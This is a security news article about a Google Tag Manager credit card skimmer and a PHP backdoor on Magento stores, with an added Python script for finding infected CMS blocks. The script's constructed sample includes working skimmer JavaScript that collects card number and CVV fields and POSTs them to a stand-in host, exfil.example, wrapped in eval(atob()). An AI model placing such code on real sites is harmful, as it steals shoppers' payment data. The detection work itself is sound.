Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Hackers are actively exploiting a vulnerability to inject an obfuscated script into e-commerce websites built on Magento. The malware is loaded through Google Tag Manager, allowing the attackers to steal credit card numbers as shoppers check out. A hidden PHP backdoor is used to keep the malicious code on the site and to steal user data.
The credit card skimmer was discovered by security researchers at Sucuri, who report that the malware is loaded from the database table cms_block.content. The Google Tag Manager (GTM) script on the website looks normal because the malicious script is encoded to avoid detection.
Once active, the malware records credit card information entered on the Magento store's pages and sends it to an external server controlled by the attacker.
Sucuri Security's researchers also discovered a PHP backdoor file. PHP files are the building blocks of many dynamic websites built on platforms such as Magento, WordPress, Drupal and Joomla, so a malicious PHP file, once injected, runs as part of the content management system itself.
The researchers identified the backdoor at this path:
./media/index.php.
According to the advisory published on the Sucuri website:
“At the time of writing, we found that at least 6 websites are currently infected with this specific Google Tag ID, indicating that this threat is actively affecting several websites.
eurowebmonitoroor[.]com is used in this malicious campaign and is currently flagged by 15 security vendors on VirusTotal.”
VirusTotal is a free online service that scans submitted files and URLs with many antivirus engines and aggregates the results.
Sucuri advises the following steps to clean an infected website:
- “Remove any suspicious GTM tags. Log in to GTM, identify and delete any suspicious tags.
- Perform a complete website scan to discover any other malware or backdoors.
- Remove all malicious scripts or backdoor files.
- Ensure that Magento and all extensions are updated with the latest security patches.
- Regularly monitor site traffic and GTM for any unusual activity.”
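Because the skimmer sits in the database (cms_block.content) rather than in the GTM console, the "scan for other malware or backdoors" step needs to look at raw CMS block rows, not just the rendered pages. The script below is an added example written for this article, not Sucuri's or Magento's own tooling. It takes (block_id, content) rows such as `SELECT block_id, content FROM cms_block;` would return, flags GTM container IDs that are not the store's own, spots inline scripts that unwrap encoded code at runtime, decodes long base64 runs and reports which payment fields and hosts the decoded payload touches, and lists PHP files under media/ (where the ./media/index.php backdoor was found). The sample rows, the container IDs, the host exfil.example and the payment field names it looks for are all constructed or assumed for the example.

```python
"""Triage helpers for a Magento store suspected of a GTM-loaded skimmer.

Added example, not Sucuri's or Magento's code. The cms_block rows below are
constructed; in practice feed the function the output of
    SELECT block_id, content FROM cms_block;
The host exfil.example and the GTM container IDs are placeholders.
"""
import base64
import re

# Google Tag Manager container IDs have the form GTM-XXXXXXX.
GTM_ID_RE = re.compile(r"GTM-[A-Z0-9]{4,10}")
# Long base64-looking runs are the usual wrapper for an encoded inline skimmer.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Primitives used to unwrap and execute encoded script at runtime.
OBFUSCATION_RE = re.compile(r"\b(eval|atob|unescape|fromCharCode)\s*\(", re.I)
# Field names a checkout skimmer goes after (assumed Magento payment form names).
PAYMENT_FIELD_RE = re.compile(r"cc_number|cc_cid|cc_exp_year|cc_exp_month|cvv|card_number", re.I)
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def decode_base64_runs(text):
    """Decode every long base64 run in text that yields printable UTF-8."""
    decoded = []
    for match in B64_RUN_RE.finditer(text):
        chunk = match.group(0)
        try:
            raw = base64.b64decode(chunk + "=" * (-len(chunk) % 4), validate=True)
            payload = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # not real base64 or not text
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in payload):
            decoded.append(payload)
    return decoded


def scan_cms_block(block_id, content, allowed_gtm_ids):
    """Return human-readable findings for one cms_block.content value."""
    findings = []
    for gtm_id in sorted(set(GTM_ID_RE.findall(content)) - set(allowed_gtm_ids)):
        findings.append(f"block {block_id}: unexpected GTM container {gtm_id}")
    if OBFUSCATION_RE.search(content):
        findings.append(f"block {block_id}: inline script unwraps encoded code at runtime")
    for payload in decode_base64_runs(content):
        fields = sorted({m.group(0).lower() for m in PAYMENT_FIELD_RE.finditer(payload)})
        hosts = sorted({m.group(1).lower() for m in HOST_RE.finditer(payload)})
        if fields or hosts:
            findings.append(f"block {block_id}: encoded payload reads {fields} and contacts {hosts}")
    return findings


def triage_cms_blocks(rows, allowed_gtm_ids):
    """Scan (block_id, content) rows; allowed_gtm_ids is the store's own container(s)."""
    findings = []
    for block_id, content in rows:
        findings.extend(scan_cms_block(block_id, content, allowed_gtm_ids))
    return findings


def php_under_media(paths, known_good=frozenset()):
    """media/ holds uploads, so any PHP there (like ./media/index.php) needs an explanation."""
    return sorted(p for p in paths
                  if p.startswith("media/")
                  and p.lower().endswith((".php", ".phtml", ".phar"))
                  and p not in known_good)


# Constructed sample data: one legitimate block, one injected block, one plain block.
SKIMMER_JS = ("var d={};document.querySelectorAll('input[name*=cc_number],input[name*=cc_cid]')"
              ".forEach(function(e){d[e.name]=e.value;});"
              "fetch('https://exfil.example/collect',{method:'POST',body:JSON.stringify(d)});")
SKIMMER_B64 = base64.b64encode(SKIMMER_JS.encode()).decode()

SAMPLE_ROWS = [
    (1, "<script src=\"https://www.googletagmanager.com/gtm.js?id=GTM-ABCD123\"></script>"),
    (2, "<script src=\"https://www.googletagmanager.com/gtm.js?id=GTM-ZZZZ999\"></script>"
        f"<script>eval(atob('{SKIMMER_B64}'))</script>"),
    (3, "<p>Free shipping on orders over $50</p>"),
]
STORE_GTM_IDS = {"GTM-ABCD123"}  # the container the store actually registered

if __name__ == "__main__":
    for line in triage_cms_blocks(SAMPLE_ROWS, STORE_GTM_IDS):
        print(line)
    print(php_under_media(["media/catalog/product/a.jpg", "media/index.php", "app/etc/config.php"]))
```

Run it against the real table dump and the real file listing: a second container ID, an `eval(atob(...))` wrapper, or a decoded payload that names payment fields and an outside host are each enough to treat the block as injected. Check the database rather than the admin CMS block editor, which renders the HTML and hides what the raw content contains, and compare media/ against a clean Magento installation before trusting any PHP file found there.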
Read the full advisory:
Google Tag Manager Skimmer Stole Credit Card data from Magento website
Featured image: Shutterstock/SDX15